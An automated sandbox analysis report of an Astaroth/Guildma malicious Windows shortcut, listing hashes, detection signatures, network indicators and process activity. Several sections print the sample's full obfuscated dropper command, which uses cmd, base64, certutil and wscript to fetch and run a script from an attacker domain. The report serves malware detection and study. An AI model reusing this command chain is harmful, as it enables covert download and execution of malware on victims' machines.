Windows Analysis Report
gzLeH3Dmtn.lnk

Overview

General Information

Sample Name: gzLeH3Dmtn.lnk
Analysis ID: 795670
MD5: 6a04cb119228b5ca8bb2fc2f4856103f
SHA1: 2f7eb865bd303466749a66e5cee8f21962d43cd0
SHA256: 0135bf39f5a2167cce8af04e8eaac0caee8b52123fea1a3ec2411be0a92da400
Tags: Astaroth, BRA, geo, Guildma, lnk

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2

Networking

Source: C:\Windows\System32\wscript.exe Domain query: a8eiy8.innovationsinsight.cyou
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 80
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443
Source: Traffic Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.4:49692 -> 188.114.96.3:80
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:21:01 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=NctGf338qS6Q8cshuHpQF7uH_MOJuTny5ADo4vU.xqk-1675232461-0-AW1Q7h5OMBuCvlggYK/BHKQyYSg3tgfvIRV9fHORHnQWMveDPLyaOdJTr2ypAAtGC4AQ5arCEIABAKODWktmY4Z2CurBlCA7OX1h8Nee2olT; path=/; expires=Wed, 01-Feb-23 06:51:01 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=4.9999998736894e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uv4Cu%2FH5ZRDqWs91VT3dCsC%2BGWzlthG4vMasGJWkt%2FsaHORTre%2BFtRjecD8DDQyi73ORgxl9At0bvivDoskcD6jynlgVCR8YlFvxCZXi6MR5WVHS423b2XGhqKRGnmUdjuCtYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnj5V9pFxnTHRN; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:21:01 GMT; HttpOnlyServer: cloudflareCF-RAY: 792895a4c8f030db-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/l
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/?3/
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311600820.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310925472.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorT
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorfM
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/g
Source: unknown DNS traffic detected: queries for: a8eiy8.innovationsinsight.cyou
Source: C:\Windows\System32\certutil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: classification engine Classification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310977085.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Domain query: a8eiy8.innovationsinsight.cyou
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 80
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\ydgc5p9\>nul 2>&1 &&s^et xehh=c:\ydgc5p9\^ydgc5p9.^js&&echo dmfyiem0nxq9innjiisicii7rdq1dd0iaxaikyj0omgio0u0nxq9ilqikyj0ucirijoio0dlde9iamvjdchdndv0k0q0nxqrrtq1dcsily9hogvpetguaw5ub3zhdglvbnnpbnnpz2h0lmn5b3uvpzmviik7>!xehh!&&certutil -f -deco^de !xehh! !xehh!&&ca^ll !xehh!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS"
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid